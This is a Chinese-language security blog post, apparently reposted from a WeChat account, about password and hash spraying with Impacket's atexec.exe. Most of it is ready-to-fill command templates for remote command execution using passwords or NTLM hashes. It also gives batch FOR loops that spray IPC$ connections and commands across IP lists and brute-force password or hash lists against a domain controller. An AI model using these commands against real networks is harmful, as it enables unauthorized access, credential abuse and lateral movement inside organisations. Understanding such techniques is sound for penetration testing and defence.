使用atexec 进行喷洒攻击

admin 2022年10月1日08:40:15评论133 views字数 1336阅读4分27秒阅读模式
使用atexec 进行喷洒攻击

点击上方蓝字关注我们

使用atexec 进行喷洒攻击

使用atexec传递密码或hash

https://github.com/maaaaz/impacket-examples-windows

注意事项

atexec最好需要指定administrator用户

atexec首次执行需要执行两次

如下图所示:

第一次以普通管理员用户执行命令,失败。

第二次以administrator执行命令,成功建立连接,但是命令执行失败。

再次以administrator执行命令,成功,有回显。

使用atexec 进行喷洒攻击

单个传递密码

域环境下

atexec.exe <domain>/<username>:<password>@<ip> "<command>"

本地环境下

atexec.exe ./<username>:<password>@<ip> "<command>"

单个传递hash(ntlmhash)

使用atexec 进行喷洒攻击

域环境下

atexec.exe  -hashes :<hash> <domain>/<username>@<ip> "<command>"

本地环境下

atexec.exe  -hashes :<hash> ./<username>@<ip> "<command>"

批量传递密码

注意事项

如果写成批处理,那么%i需要变成%%i

(ips.txt)需要使用小括号包裹

DOS命令

dos命令除了变量以外不区分大小写,包括执行参数也不区分大小写。

批量尝试连接ipc$,连接成功后可以使用net use查看。

for /f %i in (<ips.txt>) do net use \%iipc$ "<password>" /user:<username>

明文密码批量执行命令

FOR /F %i in (<ips.txt>) do atexec.exe ./<username>:<passwd>@%i "<command>"

hash批量执行命令

FOR /F %i in (<ips.txt>) do atexec.exe -hashes :<hash> ./<username>@%i "<command>"

爆破域控密码

指定密码或者hash去爆破指定机器

# 指定密码集
FOR /F %i in (<passswds.txt>) do atexec.exe ./<username>:&i@<ip> "<command>"
# 指定hash集
FOR /F %i in (<hashs.txt>) do atexec.exe -hashes :%i ./<username>@<ip> "<command>"



使用atexec 进行喷洒攻击



Eightbit 致力于寻找一群热爱技术、热爱分享的大佬师傅们,组建一个简单的圈子。简单到在这个的圈子里大家没有任何利益,没有任何冲突,大家只有一个简单的夙愿,就是在一起交流交流技术,交流交流想法,一起开心的吹吹水就好。我们交流的内容主要在网络安全方向,包括但不限于web安全、内网渗透、免杀、逆向分析、二进制分析、移动逆向分析、安全竞赛等。不论你是大佬、还是一个憧憬进入网络安全圈子的新秀,大家在技术面前都是平等的,我们都可以一切交流学习。有想法的师傅们可以加入我们的交流群一起交流哦~

使用atexec 进行喷洒攻击


喜欢就点个在看再走吧 使用atexec 进行喷洒攻击



原文始发于微信公众号(Eightbit):使用atexec 进行喷洒攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月1日08:40:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用atexec 进行喷洒攻击https://cn-sec.com/archives/1326281.html

发表评论

匿名网友 填写信息